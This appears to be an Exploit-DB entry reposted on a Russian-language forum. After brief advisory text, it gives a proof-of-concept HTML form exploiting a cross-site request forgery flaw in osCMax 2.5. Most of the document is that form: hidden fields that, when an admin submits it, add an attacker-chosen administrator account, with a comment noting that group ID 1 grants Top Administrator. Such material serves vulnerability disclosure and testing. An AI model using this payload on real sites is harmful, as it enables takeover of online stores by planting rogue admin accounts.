- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39118
- Проверка EDB
-
- Пройдено
- Автор
- TUNISIAN CYBER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-03-17
osCMax 2.5 - Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/66272/info
osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
<html>
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
<input type="hidden" name="admin_username" value="THETUNISIAN"/>
<input type="hidden" name="admin_firstname" value="Moot3x"/>
<input type="hidden" name="admin_lastname" value="Saad3x"/>
<input type="hidden" name="admin_email_address" value="[email protected]"/>
<input type="hidden" name="admin_groups_id" value="1"/>
<!-- About "admin_groups_id" -->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service -->
<input type='submit' name='Submit4' value="Agregar">
</form>
</html>- Источник
- www.exploit-db.com
